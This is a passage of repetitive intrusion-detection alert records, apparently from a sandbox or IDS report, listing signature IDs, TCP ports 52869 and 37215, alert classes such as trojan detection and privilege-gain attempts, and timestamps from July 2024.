                      Source Port:56428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:56422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.123155
                      SID:2027339
                      Source Port:46746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.041672
                      SID:2027339
                      Source Port:41128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.493932
                      SID:2025132
                      Source Port:48246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.406731
                      SID:2025132
                      Source Port:46448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:46656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649912
                      SID:2829579
                      Source Port:50062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.349768
                      SID:2025132
                      Source Port:56034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.010540
                      SID:2831300
                      Source Port:53462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2829579
                      Source Port:34110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:42056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2829579
                      Source Port:47392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.903232
                      SID:2027339
                      Source Port:51704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.750477
                      SID:2027339
                      Source Port:47958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:33378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.145997
                      SID:2025132
                      Source Port:58762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.696197
                      SID:2025132
                      Source Port:44628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.405782
                      SID:2025132
                      Source Port:54972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.560530
                      SID:2027339
                      Source Port:43976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.360754
                      SID:2025132
                      Source Port:54610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:34334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:35478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.919931
                      SID:2831300
                      Source Port:32798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.234960
                      SID:2027339
                      Source Port:36880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.611005
                      SID:2027339
                      Source Port:56342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.499887
                      SID:2027339
                      Source Port:35622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.086033
                      SID:2027339
                      Source Port:59968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.159715
                      SID:2027339
                      Source Port:49550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.546480
                      SID:2831300
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.312411
                      SID:2027339
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2829579
                      Source Port:35110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044293
                      SID:2829579
                      Source Port:40776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.255748
                      SID:2027339
                      Source Port:60794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.741840
                      SID:2027339
                      Source Port:50022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:37752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.828807
                      SID:2027339
                      Source Port:46608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.044692
                      SID:2025132
                      Source Port:33658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.978142
                      SID:2835222
                      Source Port:51306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.298100
                      SID:2027339
                      Source Port:57352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.280127
                      SID:2027339
                      Source Port:36392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906354
                      SID:2027339
                      Source Port:40552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.354566
                      SID:2025132
                      Source Port:48434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.536855
                      SID:2027339
                      Source Port:60210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.596881
                      SID:2025132
                      Source Port:35476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.014835
                      SID:2025132
                      Source Port:55010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.550846
                      SID:2025132
                      Source Port:52846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:33952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2829579
                      Source Port:44574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.562310
                      SID:2027339
                      Source Port:57736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.476791
                      SID:2027339
                      Source Port:56214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.647416
                      SID:2027339
                      Source Port:58418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.987935
                      SID:2027339
                      Source Port:36258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.109958
                      SID:2027339
                      Source Port:51562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520254
                      SID:2025132
                      Source Port:59858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.288586
                      SID:2025132
                      Source Port:33274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2831300
                      Source Port:50930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2829579
                      Source Port:39282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:35020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.053348
                      SID:2831300
                      Source Port:48152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.707284
                      SID:2025132
                      Source Port:55918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2831300
                      Source Port:60890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.468208
                      SID:2025132
                      Source Port:50766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.930155
                      SID:2027339
                      Source Port:40160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.499887
                      SID:2027339
                      Source Port:42864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.893328
                      SID:2027339
                      Source Port:47168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.957644
                      SID:2027339
                      Source Port:59666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.890948
                      SID:2027339
                      Source Port:49942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.267116
                      SID:2027339
                      Source Port:57100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.406953
                      SID:2025132
                      Source Port:43978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2835222
                      Source Port:36304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.622289
                      SID:2831300
                      Source Port:42376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:09.021221
                      SID:2027339
                      Source Port:49184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.569791
                      SID:2027339
                      Source Port:52506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.489480
                      SID:2831300
                      Source Port:53146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2831300
                      Source Port:48736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2829579
                      Source Port:34602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.519318
                      SID:2027339
                      Source Port:53592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.632381
                      SID:2027339
                      Source Port:43208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2835222
                      Source Port:59180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2835222
                      Source Port:35526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.323042
                      SID:2831300
                      Source Port:43226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:39268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.467111
                      SID:2027339
                      Source Port:55928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.257796
                      SID:2025132
                      Source Port:39230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.996055
                      SID:2829579
                      Source Port:32826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2835222
                      Source Port:42644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2829579
                      Source Port:43242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.010869
                      SID:2027339
                      Source Port:55142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2835222
                      Source Port:44882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2829579
                      Source Port:44916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.728463
                      SID:2025132
                      Source Port:52602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.185498
                      SID:2027339
                      Source Port:37436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.813695
                      SID:2027339
                      Source Port:36740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.812448
                      SID:2027339
                      Source Port:52854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:46260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2829579
                      Source Port:32976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2835222
                      Source Port:38808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:48142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:54716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.470759
                      SID:2831300
                      Source Port:57332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.966302
                      SID:2835222
                      Source Port:43454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.944341
                      SID:2027339
                      Source Port:51422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.602081
                      SID:2027339
                      Source Port:52140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2835222
                      Source Port:54706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.204741
                      SID:2025132
                      Source Port:52070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.950526
                      SID:2027339
                      Source Port:39512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.072139
                      SID:2027339
                      Source Port:56536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2027339
                      Source Port:38496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2831300
                      Source Port:32880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2829579
                      Source Port:57116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.841280
                      SID:2027339
                      Source Port:46040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816277
                      SID:2829579
                      Source Port:44124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:52270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:45996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:55006
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2835222
                      Source Port:50092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817298
                      SID:2835222
                      Source Port:40146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249042
                      SID:2025132
                      Source Port:53186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2831300
                      Source Port:39260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.085956
                      SID:2025132
                      Source Port:57422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.591520
                      SID:2831300
                      Source Port:53006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.310941
                      SID:2027339
                      Source Port:34298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:56072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.236014
                      SID:2025132
                      Source Port:60634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.026812
                      SID:2835222
                      Source Port:47382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.509340
                      SID:2025132
                      Source Port:56156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.085856
                      SID:2027339
                      Source Port:56566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:55630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.464382
                      SID:2025132
                      Source Port:60510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.058685
                      SID:2025132
                      Source Port:60424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.165780
                      SID:2027339
                      Source Port:57706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.259207
                      SID:2025132
                      Source Port:55498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2829579
                      Source Port:53950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.758923
                      SID:2831300
                      Source Port:58628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.141970
                      SID:2027339
                      Source Port:56970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.447869
                      SID:2831300
                      Source Port:55486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.527007
                      SID:2025132
                      Source Port:47348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.688552
                      SID:2025132
                      Source Port:37880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:48950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.380019
                      SID:2831300
                      Source Port:49674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:44702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.287905
                      SID:2027339
                      Source Port:55880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.392835
                      SID:2831300
                      Source Port:51270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.878385
                      SID:2025132
                      Source Port:50708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2831300
                      Source Port:53888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.085956
                      SID:2025132
                      Source Port:55404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.219232
                      SID:2027339
                      Source Port:58748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.207040
                      SID:2829579
                      Source Port:53312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2829579
                      Source Port:39850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.057729
                      SID:2829579
                      Source Port:51132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.288086
                      SID:2027339
                      Source Port:57260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.415663
                      SID:2831300
                      Source Port:56738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.751559
                      SID:2025132
                      Source Port:43492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.833522
                      SID:2025132
                      Source Port:48236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.471349
                      SID:2025132
                      Source Port:42752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.485253
                      SID:2025132
                      Source Port:50448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.985732
                      SID:2027339
                      Source Port:41786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.497526
                      SID:2025132
                      Source Port:55536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.285243
                      SID:2831300
                      Source Port:47850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.323042
                      SID:2831300
                      Source Port:38880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.198681
                      SID:2025132
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.332211
                      SID:2027339
                      Source Port:51470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.294006
                      SID:2831300
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.693537
                      SID:2025132
                      Source Port:44936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.103737
                      SID:2829579
                      Source Port:36284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.442442
                      SID:2831300
                      Source Port:55828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.028157
                      SID:2027339
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.638042
                      SID:2835222
                      Source Port:51356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.562532
                      SID:2025132
                      Source Port:41584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.296959
                      SID:2027339
                      Source Port:49948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2831300
                      Source Port:53264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.262556
                      SID:2831300
                      Source Port:39514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2829579
                      Source Port:50594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.888686
                      SID:2025132
                      Source Port:51016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2835222
                      Source Port:57042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.318206
                      SID:2831300
                      Source Port:57560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:13.277683
                      SID:2027339
                      Source Port:52292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.322055
                      SID:2025132
                      Source Port:53270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.819962
                      SID:2027339
                      Source Port:49936
                      Destination Port:52869
